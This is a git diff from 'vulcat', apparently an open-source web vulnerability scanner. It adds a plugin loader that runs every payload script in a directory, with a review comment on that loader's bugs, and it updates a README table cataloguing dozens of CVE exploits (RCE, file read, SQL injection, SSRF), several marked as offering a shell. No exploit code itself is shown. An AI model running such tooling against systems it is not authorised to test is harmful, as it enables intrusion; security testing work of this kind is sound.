delete mode 100644 payloads/Spring/cve_2022_22963.py
delete mode 100644 payloads/Spring/cve_2022_22965.py
delete mode 100644 payloads/Spring/main.py
create mode 100644 payloads/Spring/spring-boot-cve-2021-21234-fileread.py
create mode 100644 payloads/Spring/spring-cloud-config-cve-2020-5410-fileread.py
create mode 100644 payloads/Spring/spring-cloud-function-cve-2022-22963-rce.py
create mode 100644 payloads/Spring/spring-cloud-gateway-cve-2022-22947-rce.py
create mode 100644 payloads/Spring/spring-cve-2022-22965-rce.py
create mode 100644 payloads/Spring/spring-data-commons-cve-2018-1273-rce.py
create mode 100644 payloads/Spring/spring-data-rest-cve-2017-8046-rce.py
create mode 100644 payloads/Spring/spring-security-oauth-cve-2016-4977-rce.py
delete mode 100644 payloads/Supervisor/cve_2017_11610.py
delete mode 100644 payloads/Supervisor/main.py
create mode 100644 payloads/Supervisor/supervisor-cve-2017-11610-rce.py
delete mode 100644 payloads/ThinkPHP/_2_x_rce.py
delete mode 100644 payloads/ThinkPHP/_5_ids_sqlinject.py
delete mode 100644 payloads/ThinkPHP/cnnvd_201901_445.py
delete mode 100644 payloads/ThinkPHP/cnvd_2018_24942.py
delete mode 100644 payloads/ThinkPHP/cnvd_2022_86535.py
delete mode 100644 payloads/ThinkPHP/cve_2018_1002015.py
delete mode 100644 payloads/ThinkPHP/main.py
create mode 100644 payloads/ThinkPHP/main.txt
create mode 100644 payloads/ThinkPHP/thinkphp-2.x-rce.py
create mode 100644 payloads/ThinkPHP/thinkphp-5-ids-sqlinject.py
create mode 100644 payloads/ThinkPHP/thinkphp-cnnvd-201901-445-rce.py
create mode 100644 payloads/ThinkPHP/thinkphp-cnvd-2018-24942-rce.py
create mode 100644 payloads/ThinkPHP/thinkphp-cnvd-2022-86535-rce.py
create mode 100644 payloads/ThinkPHP/thinkphp-cve-2018-1002015-rce.py
delete mode 100644 payloads/Ueditor/main.py
delete mode 100644 payloads/Ueditor/ssrf.py
create mode 100644 payloads/Ueditor/ueditor-ssrf.py
create mode 100644 payloads/VMware/test.tar
create mode 100644 payloads/VMware/vmware-vcenter-2020-10-fileread.py
create mode 100644 payloads/VMware/vmware-vcenter-cve-2021-21972-fileupload-rce.py
delete mode 100644 payloads/Weblogic/cve_2014_4210.py
delete mode 100644 payloads/Weblogic/cve_2017_10271.py
delete mode 100644 payloads/Weblogic/cve_2019_2725.py
delete mode 100644 payloads/Weblogic/cve_2020_14750.py
delete mode 100644 payloads/Weblogic/cve_2020_14882.py
delete mode 100644 payloads/Weblogic/cve_2021_2109.py
delete mode 100644 payloads/Weblogic/main.py
create mode 100644 payloads/Weblogic/oracle-weblogic-cve-2014-4210-ssrf.py
create mode 100644 payloads/Weblogic/oracle-weblogic-cve-2017-10271-unserialize.py
create mode 100644 payloads/Weblogic/oracle-weblogic-cve-2019-2725-unserialize.py
create mode 100644 payloads/Weblogic/oracle-weblogic-cve-2020-14750-bypass.py
create mode 100644 payloads/Weblogic/oracle-weblogic-cve-2020-14882-rce-unauth.py
create mode 100644 payloads/Weblogic/oracle-weblogic-cve-2021-2109-rce.py
delete mode 100644 payloads/Webmin/cve_2019_15107.py
delete mode 100644 payloads/Webmin/cve_2019_15642.py
delete mode 100644 payloads/Webmin/main.py
create mode 100644 payloads/Webmin/webmin-cve-2019-15107-rce.py
create mode 100644 payloads/Webmin/webmin-cve-2019-15642-rce.py
delete mode 100644 payloads/Yonyou/cnnvd_201610_923.py
delete mode 100644 payloads/Yonyou/cnvd_2021_30167.py
delete mode 100644 payloads/Yonyou/main.py
delete mode 100644 payloads/Yonyou/nc_fileread.py
delete mode 100644 payloads/Yonyou/u8_oa_getsession.py
delete mode 100644 payloads/Yonyou/u8_oa_test_sqlinject.py
create mode 100644 payloads/Yonyou/yonyou-erp-nc-ncfindweb-fileread.py
create mode 100644 payloads/Yonyou/yonyou-grp-u8-cnnvd-201610-923-sqlinject.py
create mode 100644 payloads/Yonyou/yonyou-nc-cnvd-2021-30167-rce.py
create mode 100644 payloads/Yonyou/yonyou-u8-oa-getsession-dsinfo.py
create mode 100644 payloads/Yonyou/yonyou-u8-oa-test.jsp-sqlinject.py
delete mode 100644 payloads/Zabbix/cve_2016_10134.py
delete mode 100644 payloads/Zabbix/main.py
create mode 100644 payloads/Zabbix/zabbix-cve-2016-10134-sqlinject.py
delete mode 100644 payloads/demo/main.py
delete mode 100644 payloads/demo/scan.py
delete mode 100644 payloads/demo/scan_2.py
delete mode 100644 payloads/phpMyadmin/cve_2018_12613.py
delete mode 100644 payloads/phpMyadmin/main.py
create mode 100644 payloads/phpMyadmin/phpmyadmin-cve-2018-12613-fileinclude-fileread.py
create mode 100644 payloads/phpMyadmin/phpmyadmin-wooyun-2016-199433-unserialize.py
delete mode 100644 payloads/phpMyadmin/wooyun_2016_199433.py
delete mode 100644 payloads/phpUint/cve_2017_9841.py
delete mode 100644 payloads/phpUint/main.py
create mode 100644 payloads/phpUint/phpunit-cve-2017-9841-rce.py
delete mode 100644 payloads/uWSGIPHP/cve_2018_7490.py
delete mode 100644 payloads/uWSGIPHP/main.py
create mode 100644 payloads/uWSGIPHP/uwsgiphp-cve-2018-7490-fileread.py
diff --git a/PluginManager.py b/PluginManager.py
new file mode 100644
index 0000000..e95064a
--- /dev/null
+++ b/PluginManager.py
@@ -0,0 +1,148 @@
+#!/usr/bin/env python3
+# -*- coding:utf-8 -*-
+
+'''
+代码来源: https://cloud.tencent.com/developer/article/1567791
+经过一点小修改后, 可用于vulcat
+'''
+
+### 插件式框架
+import os
+import sys
+from imp import find_module
+from imp import load_module
+from lib.tool import color
+
+class PluginManager(type):
+ #静态变量配置插件路径
+ __PluginPath = './payloads/'
+
+ #调用时将插件注册
+ def __init__(self, name, bases, dict):
+ if not hasattr(self,'AllPlugins'):
+ self.__AllPlugins = {}
+ else:
+ self.RegisterAllPlugin(self)
+
+ #设置插件路径
+ @staticmethod
+ def SetPluginPath(path):
+ if os.path.isdir(path):
+ PluginManager.__PluginPath = path
+ else:
+ print(color.red('The "{PATH}" is not a valid path!!!\n\nPlease check config.yaml'.format(PATH=path)))
+ print(color.reset())
+ os._exit(1)
+
+ @staticmethod
+ def Whitelist(list, moduleName):
+ '''
+ 检查该模块是否在 提供的白名单中
+ 在 -> True
+ 不在 -> False
+ '''
+ if not list: # * 如果白名单中没有元素, 说明未启用白名单功能, 默认True
+ return True
+
+ for l in list:
+ if l in moduleName:
+ return True
+
+ return False
+
+ #递归检测插件路径下的所有插件,并将它们存到内存中
+ @staticmethod
+ def LoadAllPlugin(vulns = []):
+ pluginPath = PluginManager.__PluginPath
+
+ if not os.path.isdir(pluginPath):
+ raise EnvironmentError
+ # raise EnvironmentError,'%s is not a directory' % pluginPath
+
+ items = os.listdir(pluginPath)
+ for item in items:
+ if os.path.isdir(os.path.join(pluginPath, item)):
+ PluginManager.__PluginPath = os.path.join(pluginPath, item)
+ PluginManager.LoadAllPlugin(vulns)
+ else:
+ if not PluginManager.Whitelist(vulns, item):
+ continue # * 如果该Payload不在vulns白名单中, 则跳过添加
+
+ if item.endswith('.py') and item != '__init__.py':
+ moduleName = item[:-3]
+
+ if moduleName not in sys.modules:
+ fileHandle, filePath, dect = find_module(moduleName, [pluginPath])
+ else:
+ continue
+
+ try:
+ moduleObj = load_module(moduleName, fileHandle, filePath, dect)
+ except Exception as e:
+ print(color.red('The POC "{NAME}" is Error!!!'.format(NAME=item)))
+ print(e)
+ print(color.reset())
+ os._exit(1)
+ finally:
+ if fileHandle : fileHandle.close()
+
+ #返回所有的插件
+ @property
+ def AllPlugins(self):
+ return self.__AllPlugins
+
+ #注册插件
+ def RegisterAllPlugin(self, aPlugin):
+ pluginName = '.'.join([aPlugin.__module__,aPlugin.__name__])
+ pluginObj = aPlugin()
+ self.__AllPlugins[pluginName] = pluginObj
+
+ #注销插件
+ def UnregisterPlugin(self, pluginName):
+ if pluginName in self.__AllPlugins:
+ pluginObj = self.__AllPlugins[pluginName]
+ del pluginObj
+
+ #获取插件对象。
+ def GetPluginObject(self, pluginName = None):
+ if pluginName is None:
+ return self.__AllPlugins.values()
+ else:
+ result = self.__AllPlugins[pluginName] if pluginName in self.__AllPlugins else None
+ return result
+
+ #根据插件名字,获取插件对象。(提供插件之间的通信)
+ @staticmethod
+ def GetPluginByName(pluginName):
+ if pluginName is None:
+ return None
+ else:
+ for SingleModel in __ALLMODEL__:
+ plugin = SingleModel.GetPluginObject(pluginName)
+ if plugin:
+ return plugin
+
+# * 插件框架的接入点。便于管理各个插件。
+# * 各个插件通过继承接入点类,利用Python中metaclass的优势,将插件注册。
+# * 接入点中定义了各个插件模块必须要实现的接口。
+class Vuln_Scan(object, metaclass=PluginManager):
+ '''
+ 漏洞检测
+ '''
+ def POC(self):
+ print ('Please write the POC() function')
+
+ def EXP(self):
+ print ('Please write the EXP() function')
+
+ def Start(self):
+ print ('Please write the Start() function')
+
+class Model_Placeholder(object, metaclass=PluginManager):
+ '''
+ 占位
+ '''
+ def ABCDEFGHIJKLMNOPQRSTUVWXYZ(self):
+ print ('Please write the ABCDEFGHIJKLMNOPQRSTUVWXYZ() function')
+
+__ALLMODEL__ = (Vuln_Scan, Model_Placeholder)
\ No newline at end of file
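Review bot: `UnregisterPlugin` never removes anything — the `del pluginObj` at its end only unbinds the local name, so the entry stays in `__AllPlugins` and `GetPluginObject` keeps returning it; the body should be `self.__AllPlugins.pop(pluginName, None)`. `LoadAllPlugin` likewise overwrites the class-level `__PluginPath` with each subdirectory while recursing and never restores it, so a second call scans only the last subdirectory visited instead of the configured root; passing the directory as an argument (or restoring the attribute after the loop) would keep the root intact. `from imp import find_module` / `load_module` relies on a module deprecated since Python 3.4 and removed in 3.12, so this new file will not import on current interpreters; `importlib.util.spec_from_file_location` plus `module_from_spec` and `spec.loader.exec_module` is the supported replacement. Note also that `os._exit(1)` in the `except` branch bypasses the `finally:`, so `fileHandle` is left open when a broken POC aborts the load, and since every `.py` under the configured path is executed at load time, the module docstring should state that the payload directory must be writable only by the operator.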
diff --git a/README.en-us.md b/README.en-us.md
index 1f60efd..c84edaf 100644
--- a/README.en-us.md
+++ b/README.en-us.md
@@ -1,7 +1,7 @@
# vulcat
[![python](https://img.shields.io/badge/Python-3-blue?logo=python)](https://shields.io/)
-[![version](https://img.shields.io/badge/Version-1.2.0-blue)](https://shields.io/)
+[![version](https://img.shields.io/badge/Version-2.0.0-blue)](https://shields.io/)
[![license](https://img.shields.io/badge/LICENSE-GPL-yellow)](https://shields.io/)
[![stars](https://img.shields.io/github/stars/CLincat/vulcat?color=red)](https://shields.io/)
[![forks](https://img.shields.io/github/forks/CLincat/vulcat?color=red)](https://shields.io/)
@@ -43,10 +43,10 @@ Usage: python3 vulcat.py
Examples:
python3 vulcat.py -h
python3 vulcat.py --list
-python3 vulcat.py -u https://www.example.com/ -o html
-python3 vulcat.py -u https://www.example.com/ -a httpd --log 3
-python3 vulcat.py -u https://www.example.com/ -a thinkphp -v cnvd-2018-24942
-python3 vulcat.py -f url.txt --delay 0.5
+python3 vulcat.py -u https://www.example.com/
+python3 vulcat.py -f url.txt -o html
+python3 vulcat.py -u https://www.example.com/ -v httpd --log 3
+python3 vulcat.py -u https://www.example.com/ -v cnvd-2018-24942 --shell
```
## Options
@@ -102,10 +102,6 @@ Options:
Application:
Specify the target type for the scan
- -a APPLICATION, --application=APPLICATION
- Specifies the target type, for supported frameworks,
- see the tips at the bottom, separated by commas (e.g.
- thinkphp / thinkphp,weblogic) (default: auto)
-v VULN, --vuln=VULN
Specify the vulnerability number,With -a/--application
to scan a single vulnerability,You can use --list to
@@ -149,15 +145,6 @@ Options:
Vulnerability list
--list View all payload
-
- Supported target types(Case insensitive):
- airflow, AliDruid, apachedruid, apacheunomi, apisix, appweb, cisco,
- confluence, discuz, django, drupal, elasticsearch, f5bigip, fastjson,
- flink, gitea, gitlab, grafana, gocd, hadoop, httpd, influxdb, jenkins,
- jetty, jupyter, joomla, jboss, keycloak, landray, minihttpd,
- mongoexpress, nacos, nexus, nodejs, nodered, phpmyadmin, phpunit,
- rails, showdoc, skywalking, solr, spring, supervisor, thinkphp,
- tomcat, ueditor, uwsgiphp, weblogic, webmin, yonyou, zabbix
```
## language
@@ -190,176 +177,182 @@ ceye-token: Null
2. Then follow the tips in demo.py to fill in your own code and introduce POC into vulcat
-## Vulnerabilitys List
+## Payloads List
-The current web vulnerabilities that support scanning: [Click on]
+vulcat Payloads List: [Click on]
```
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Target | Vuln id | Vuln Type | Sh | Description |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Alibaba Druid | (None) | unAuth | - | Alibaba Druid unAuthorized |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Alibaba Nacos | CVE-2021-29441 | unAuth | - | Alibaba Nacos unAuthorized |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Apache Airflow | CVE-2020-17526 | unAuth | - | Apache Airflow Authentication bypass |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Apache APISIX | CVE-2020-13945 | unAuth | - | Apache APISIX default access token |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Apache Druid | CVE-2021-25646 | RCE | Y | Apache Druid Remote Code Execution |
-| Apache Druid | CVE-2021-36749 | FileRead | Y | Apache Druid arbitrary file reading |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Apache Flink | CVE-2020-17519 | FileRead | Y | Apache Flink Directory traversal |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Apache Hadoop | (None) | unAuth | - | Apache Hadoop YARN ResourceManager unAuthorized |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Apache Httpd | CVE-2021-40438 | SSRF | - | Apache HTTP Server 2.4.48 mod_proxy SSRF |
-| Apache Httpd | CVE-2021-41773 | FileRead/RCE | Y | Apache HTTP Server 2.4.49 Directory traversal |
-| Apache Httpd | CVE-2021-42013 | FileRead/RCE | Y | Apache HTTP Server 2.4.50 Directory traversal |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Apache SkyWalking | CVE-2020-9483 | SQLinject | - | SkyWalking SQLinject |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Apache Solr | CVE-2017-12629 | RCE | - | Solr Remote code execution |
-| Apache Solr | CVE-2019-17558 | RCE | Y | Solr RCE Via Velocity Custom Template |
-| Apache Solr | CVE-2021-27905 | SSRF/FileRead| Y | Solr SSRF/FileRead |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Apache Tomcat | CVE-2017-12615 | FileUpload | - | Put method writes to any file |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Apache Unomi | CVE-2020-13942 | RCE | Y | Apache Unomi Remote Express Language Code Execution |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| AppWeb | CVE-2018-8715 | unAuth | - | AppWeb Authentication bypass |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Atlassian Confluence | CVE-2015-8399 | FileRead | Y | Confluence any file include |
-| Atlassian Confluence | CVE-2019-3396 | FileRead | Y | Confluence Directory traversal && RCE |
-| Atlassian Confluence | CVE-2021-26084 | RCE | Y | Confluence OGNL expression command injection |
-| Atlassian Confluence | CVE-2022-26134 | RCE | Y | Confluence Remote code execution |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Cisco | CVE-2020-3580 | XSS | - | Cisco ASA/FTD XSS |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Discuz | wooyun-2010-080723 | RCE | Y | Remote code execution |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Django | CVE-2017-12794 | XSS | - | Django debug page XSS |
-| Django | CVE-2018-14574 | Redirect | - | Django CommonMiddleware URL Redirect |
-| Django | CVE-2019-14234 | SQLinject | - | Django JSONfield SQLinject |
-| Django | CVE-2020-9402 | SQLinject | - | Django GIS SQLinject |
-| Django | CVE-2021-35042 | SQLinject | - | Django QuerySet.order_by SQLinject |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Drupal | CVE-2014-3704 | SQLinject | - | Drupal < 7.32 Drupalgeddon SQLinject |
-| Drupal | CVE-2017-6920 | RCE | - | Drupal Core 8 PECL YAML Remote code execution |
-| Drupal | CVE-2018-7600 | RCE | Y | Drupal Drupalgeddon 2 Remote code execution |
-| Drupal | CVE-2018-7602 | RCE | - | Drupal Remote code execution |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| ElasticSearch | CVE-2014-3120 | RCE | Y | ElasticSearch Remote code execution |
-| ElasticSearch | CVE-2015-1427 | RCE | Y | ElasticSearch Groovy Sandbox to bypass && RCE |
-| ElasticSearch | CVE-2015-3337 | FileRead | Y | ElasticSearch Directory traversal |
-| ElasticSearch | CVE-2015-5531 | FileRead | Y | ElasticSearch Directory traversal |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| F5 BIG-IP | CVE-2020-5902 | RCE | - | BIG-IP Remote code execution |
-| F5 BIG-IP | CVE-2022-1388 | unAuth/RCE | Y | BIG-IP Remote code execution |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Fastjson | CNVD-2017-02833 | unSerialize | Y | Fastjson <= 1.2.24 deSerialization |
-| Fastjson | CNVD-2019-22238 | unSerialize | Y | Fastjson <= 1.2.47 deSerialization |
-| Fastjson | rce-1-2-62 | unSerialize | Y | Fastjson <= 1.2.62 deSerialization |
-| Fastjson | rce-1-2-66 | unSerialize | Y | Fastjson <= 1.2.66 deSerialization |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Gitea | (None) | unAuth | - | Gitea 1.4.0 unAuthorized |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Gitlab | CVE-2021-22205 | RCE | - | GitLab Pre-Auth Remote code execution |
-| Gitlab | CVE-2021-22214 | SSRF | Y | Gitlab CI Lint API SSRF |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| GoCD | CVE-2021-43287 | FileRead | Y | GoCD Business Continuity FileRead |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Grafana | CVE-2021-43798 | FileRead | Y | Grafana 8.x Directory traversal |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Influxdb | (None) | unAuth | - | influxdb unAuthorized |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| JBoss | (None) | unAuth | - | JBoss unAuthorized |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Jenkins | CVE-2018-1000861 | RCE | Y | jenkins Remote code execution |
-| Jenkins | (None) | unAuth | Y | Jenkins unAuthorized |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Jetty | CVE-2021-28164 | DSinfo | - | jetty Disclosure information |
-| Jetty | CVE-2021-28169 | DSinfo | - | jetty Servlets ConcatServlet Disclosure information |
-| Jetty | CVE-2021-34429 | DSinfo | - | jetty Disclosure information |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Joomla | CVE-2017-8917 | SQLinject | - | Joomla3.7 Core com_fields SQLinject |
-| Joomla | CVE-2023-23752 | unAuth | - | Joomla unAuthorized |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Jupyter | (None) | unAuth | - | Jupyter unAuthorized |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Keycloak | CVE-2020-10770 | SSRF | - | request_uri SSRF |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Landray | CNVD-2021-28277 | FileRead/SSRF| Y | Landray-OA FileRead/SSRF |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Mini Httpd | CVE-2018-18778 | FileRead | - | mini_httpd FileRead |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| mongo-express | CVE-2019-10758 | RCE | Y | Remote code execution |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Nexus Repository | CVE-2019-5475 | RCE | Y | 2.x yum Remote code execution |
-| Nexus Repository | CVE-2019-7238 | RCE | Y | 3.x Remote code execution |
-| Nexus Repository | CVE-2019-15588 | RCE | Y | 2019-5475 Bypass |
-| Nexus Repository | CVE-2020-10199 | RCE | Y | 3.x Remote code execution |
-| Nexus Repository | CVE-2020-10204 | RCE | Y | 3.x Remote code execution |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Nodejs | CVE-2017-14849 | FileRead | Y | Node.js Directory traversal |
-| Nodejs | CVE-2021-21315 | RCE | Y | Node.js Remote code execution |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| NodeRED | CVE-2021-3223 | FileRead | Y | Node-RED Directory traversal |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| phpMyadmin | WooYun-2016-199433 | unSerialize | - | phpMyadmin Scripts/setup.php Deserialization |
-| phpMyadmin | CVE-2018-12613 | FileInclude | Y | phpMyadmin 4.8.1 Remote File Inclusion |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| PHPUnit | CVE-2017-9841 | RCE | Y | PHPUnit Remote code execution |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Ruby on Rails | CVE-2018-3760 | FileRead | Y | Ruby on Rails Directory traversal |
-| Ruby on Rails | CVE-2019-5418 | FileRead | Y | Ruby on Rails FileRead |
-| Ruby on Rails | CVE-2020-8163 | RCE | - | Ruby on Rails Remote code execution |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| ShowDoc | CNVD-2020-26585 | FileUpload | - | ShowDoc writes to any file |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Spring | CVE-2016-4977 | RCE | - | Spring Security OAuth2 Remote Command Execution |
-| Spring | CVE-2017-8046 | RCE | - | Spring Data Rest Remote Command Execution |
-| Spring | CVE-2018-1273 | RCE | Y | Spring Data Commons Remote Command Execution |
-| Spring | CVE-2020-5410 | FileRead | Y | Spring Cloud Directory traversal |
-| Spring | CVE-2021-21234 | FileRead | Y | Spring Boot Directory traversal |
-| Spring | CVE-2022-22947 | RCE | - | Spring Cloud Gateway SpEl Remote code execution |
-| Spring | CVE-2022-22963 | RCE | Y | Spring Cloud Function SpEL Remote code execution |
-| Spring | CVE-2022-22965 | RCE | - | Spring Framework Remote code execution |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Supervisor | CVE-2017-11610 | RCE | - | Supervisor Remote Command Execution |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| ThinkPHP | CVE-2018-1002015 | RCE | Y | ThinkPHP5.x Remote code execution |
-| ThinkPHP | CNVD-2018-24942 | RCE | Y | The forced route is not enabled RCE |
-| ThinkPHP | CNNVD-201901-445 | RCE | Y | Core class Request Remote code execution |
-| ThinkPHP | CNVD-2022-86535 | RCE | - | ThinkPHP "think-lang" Remote code execution |
-| ThinkPHP | rce-2-x | RCE | - | ThinkPHP2.x Remote code execution |
-| ThinkPHP | ids-sqlinject-5 | SQLinject | - | ThinkPHP5 ids SQLinject |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Ueditor | (None) | SSRF | - | Ueditor SSRF |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| uWSGI-PHP | CVE-2018-7490 | FileRead | Y | uWSGI-PHP Directory traversal |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Oracle Weblogic | CVE-2014-4210 | SSRF | - | Weblogic SSRF |
-| Oracle Weblogic | CVE-2017-10271 | unSerialize | - | Weblogic XMLDecoder deSerialization |
-| Oracle Weblogic | CVE-2019-2725 | unSerialize | - | Weblogic wls9_async deSerialization |
-| Oracle Weblogic | CVE-2020-14750 | unAuth | - | Weblogic Authentication bypass |
-| Oracle Weblogic | CVE-2020-14882 | RCE | Y | Weblogic Unauthorized command execution |
-| Oracle Weblogic | CVE-2021-2109 | RCE | - | Weblogic LDAP Remote code execution |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Webmin | CVE-2019-15107 | RCE | Y | Webmin Pre-Auth Remote code execution |
-| Webmin | CVE-2019-15642 | RCE | Y | Webmin Remote code execution |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Yonyou | CNNVD-201610-923 | SQLinject | - | Yonyou-GRP-U8 Proxy SQLinject |
-| Yonyou | CNVD-2021-30167 | RCE | Y | Yonyou-NC BeanShell Remote code execution |
-| Yonyou | nc-fileread | FileRead | - | Yonyou-ERP-NC NCFindWeb Directory traversal |
-| Yonyou | u8-oa-getsession | DSinfo | - | Yonyou-U8-OA getSessionList.jsp Disclosure info |
-| Yonyou | u8-oa-test-sql | SQLinject | - | Yonyou-U8-OA test.jsp SQLinject |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-| Zabbix | CVE-2016-10134 | SQLinject | - | latest.php or jsrpc.php SQLinject |
-+----------------------+--------------------+--------------+-----+--------------------------------------------------------------+
-vulcat-1.2.0/2023.03.01
-108/Poc
-54/Shell
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| Payloads | Sh | Description |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| 74cms-v5.0.1-sqlinject | - | v5.0.1 AjaxPersonalController.class.php SQLinject |
+| 74cms-v6.0.4-xss | - | v6.0.4 help center search box-XSS |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| alibaba-druid-unauth | - | Alibaba Druid unAuthorized |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| alibaba-nacos-cve-2021-29441-unauth | - | Alibaba Nacos unAuthorized |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| apache-airflow-cve-2020-17526-unauth | - | Apache Airflow Authentication bypass |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| apache-apisix-cve-2020-13945-unauth | - | Apache APISIX default access token |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| apache-druid-cve-2021-25646-rce | Y | Apache Druid Remote Code Execution |
+| apache-druid-cve-2021-36749-fileread | Y | Apache Druid arbitrary file reading |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| apache-flink-cve-2020-17519-fileread | Y | Apache Flink Directory traversal |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| apache-hadoop-unauth | - | Apache Hadoop YARN ResourceManager unAuthorized |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| apache-httpd-cve-2021-40438-ssrf | - | Apache HTTP Server 2.4.48 mod_proxy SSRF |
+| apache-httpd-cve-2021-41773-rce-fileread | Y | Apache HTTP Server 2.4.49 Directory traversal |
+| apache-httpd-cve-2021-42013-rce-fileread | Y | Apache HTTP Server 2.4.50 Directory traversal |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| apache-skywalking-cve-2020-9483-sqlinject | - | SkyWalking SQLinject |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| apache-solr-cve-2017-12629-rce | - | Solr Remote code execution |
+| apache-solr-cve-2019-17558-rce | Y | Solr RCE Via Velocity Custom Template |
+| apache-solr-cve-2021-27905-ssrf-fileread | Y | Solr SSRF/FileRead |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| apache-tomcat-cve-2017-12615-fileupload | - | Put method writes to any file |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| apache-unomi-cve-2020-13942-rce | Y | Apache Unomi Remote Express Language Code Execution |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| appweb-cve-2018-8715-unauth | - | AppWeb Authentication bypass |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| atlassian-confluence-cve-2015-8399-fileread-fileinclude | Y | Confluence any file include |
+| atlassian-confluence-cve-2019-3396-fileread | Y | Confluence Directory traversal && RCE |
+| atlassian-confluence-cve-2021-26084-rce | Y | Confluence OGNL expression command injection |
+| atlassian-confluence-cve-2022-26134-rce | Y | Confluence Remote code execution |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| cisco-cve-2020-3580-xss | - | Cisco ASA/FTD XSS |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| discuz-wooyun-2010-080723-rce | Y | Remote code execution |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| django-cve-2017-12794-xss | - | Django debug page XSS |
+| django-cve-2018-14574-redirect | - | Django CommonMiddleware URL Redirect |
+| django-cve-2019-14234-sqlinject | - | Django JSONfield SQLinject |
+| django-cve-2020-9402-sqlinject | - | Django GIS SQLinject |
+| django-cve-2021-35042-sqlinject | - | Django QuerySet.order_by SQLinject |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| drupal-cve-2014-3704-sqlinject | - | Drupal < 7.32 Drupalgeddon SQLinject |
+| drupal-cve-2017-6920-rce | - | Drupal Core 8 PECL YAML Remote code execution |
+| drupal-cve-2018-7600-rce | Y | Drupal Drupalgeddon 2 Remote code execution |
+| drupal-cve-2018-7602-rce | - | Drupal Remote code execution |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| elasticsearch-cve-2014-3120-rce | Y | ElasticSearch Remote code execution |
+| elasticsearch-cve-2015-1427-rce | Y | ElasticSearch Groovy Sandbox to bypass && RCE |
+| elasticsearch-cve-2015-3337-fileread | Y | ElasticSearch Directory traversal |
+| elasticsearch-cve-2015-5531-fileread | Y | ElasticSearch Directory traversal |
++----------------------------------------------------------+-----+--------------------------------------------------------------+
+| f5bigip-cve-2020-5902-rce-fileread | - | BIG-IP Remote code execution |
+| f5bigip-cve-2022-1388-unauth-rce | Y | BIG-IP Authentication bypass RCE |
